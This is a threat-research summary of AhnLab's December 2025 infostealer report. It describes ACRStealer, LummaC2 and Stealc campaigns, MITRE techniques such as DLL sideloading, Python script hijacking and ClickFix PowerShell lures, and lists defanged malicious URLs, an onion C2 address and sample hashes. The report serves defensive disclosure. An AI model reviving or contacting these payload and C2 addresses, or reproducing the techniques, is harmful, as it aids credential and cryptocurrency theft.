Threat Research

December 2025 Infostealer Trend Report

Ahnlab
December 2025 Infostealer Trend Report

In December 2025 AhnLab ASEC observed heavy distribution of Infostealer families—ACRStealer, LummaC2, and Stealc—primarily disguised as cracks/keygens and spread via SEO-poisoned posts on legitimate websites and compromised WordPress sites. Distribution methods included EXE droppers, DLL sideloading, Python script tampering, and Tor-backed cryptocurrency‑stealing campaigns that monitor clipboards and exfiltrate BIP39 phrases. #ACRStealer #LummaC2

Keypoints

  • AhnLab ASEC uses automated collection and analysis systems (crack/patch concealment collector, email honeypot, C2 analysis) and shares real‑time IOCs via ATIP services.
  • Infostealers were commonly disguised as cracks/keygens and distributed through SEO poisoning by posting on legitimate sites and poorly managed WordPress installations.
  • The most widely distributed Infostealers in December 2025 were ACRStealer, LummaC2, and Stealc.
  • Two main execution methods observed: EXE droppers (65.8%) and DLL sideloading (34.2%), with DLL variants evading detection by resembling legitimate DLLs.
  • Trend 1: Attackers abused Python by modifying a Lib script (.Libencodingsaliases.py) to execute a downloader (md5 5cabcab4…), triggering ACRStealer via mshta and a C2 at globalsnn3‑new[.]cc.
  • Trend 2: Cryptocurrency‑stealing campaigns used compromised WordPress posts and a ClickFix technique to trick users into running a PowerShell command that installs JS malware, a Tor client (ugate.exe), scheduled tasks, and exfiltrates BIP39 phrases.
  • Malware used evasion tactics (suspending when Task Manager is opened), clipboard replacement of wallet addresses, and Tor for C2 communication to avoid detection and enable theft of crypto funds.

MITRE Techniques

  • [T1574.001 ] DLL Search Order Hijacking – DLL sideloading by “placing a legitimate EXE file and a malicious DLL file in the same folder so that when the legitimate EXE file is executed, the malicious DLL file is loaded.” (‘placing a legitimate EXE file and a malicious DLL file in the same folder so that when the legitimate EXE file is executed, the malicious DLL file is loaded.’)
  • [T1574 ] Hijack Execution Flow – Abusing Python initialization by modifying a Python library script to execute malicious code when the legitimate Python executable runs. (‘Because certain scripts within the Lib directory are executed automatically when the legitimate Python executable is launched, the attacker‑modified script is triggered as part of the normal initialization process’)
  • [T1218.005 ] Mshta – Using mshta to access C2 and trigger payload execution. (‘The malware inserted by the threat actor behaves by accessing the C2 URL via mshta’)
  • [T1059.001 ] PowerShell – Delivery via user-executed malicious PowerShell commands visible after interacting with compromised posts. (‘a malicious PowerShell command and a copy button become visible, prompting the user to execute the command manually through PowerShell.’)
  • [T1053.005 ] Scheduled Task/Job – Persisting and periodically launching components by registering JavaScript malware in Windows Task Scheduler. (‘The JavaScript malware is registered in the Windows Task Scheduler to run periodically’)
  • [T1090.003 ] Tor – C2 communications routed over the Tor network using a bundled Tor client (ugate.exe) for covert command and control. (‘using this process to communicate with the C2 server via the Tor network.’)
  • [T1056.003 ] Input Capture: Clipboard – Monitoring and replacing clipboard contents to swap victim crypto addresses with attacker addresses. (‘When it detects a cryptocurrency wallet address, it replaces it with the attacker’s wallet address.’)
  • [T1041 ] Exfiltration Over C2 Channel – Exfiltrating BIP39 mnemonic phrases and other data back to the attacker C2 server. (‘if BIP39 mnemonic phrases are detected, the malware exfiltrates them to the C2 server.’)

Indicators of Compromise

  • [MD5 ] sample malware hashes observed – 5cabcab4233affa40bb8ddd846270779, 997748c5b3e24c6f42e63445bb252501, and 5 more hashes.
  • [URLs ] C2 and download locations – hxxps://activatesoftinc[.]icu/zinfoz.dat (PowerShell download/C2), hxxps://globalsnn3-new[.]cc/newSide.forester (Python downloader C2), and http[:]//91[.]92[.]240[.]104[:]7777/apexfurllc[.]top/cattttt/Encrypted_Script[.]ps1 (hosted PS1 script).
  • [Onion URL ] Tor C2 endpoint – hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route[.]php (JS Tor agent C2).
  • [FQDN ] compromised/abused domains – www[.]braix[.]top (distribution site) and activatesoftinc[.]icu (C2 host).
  • [File names ] files created or used by campaigns – ugate.exe (Tor client/Trojan), Encrypted_Script.ps1 (dropper script), and text file containing BIP39 keywords.

Read more: https://asec.ahnlab.com/en/92142/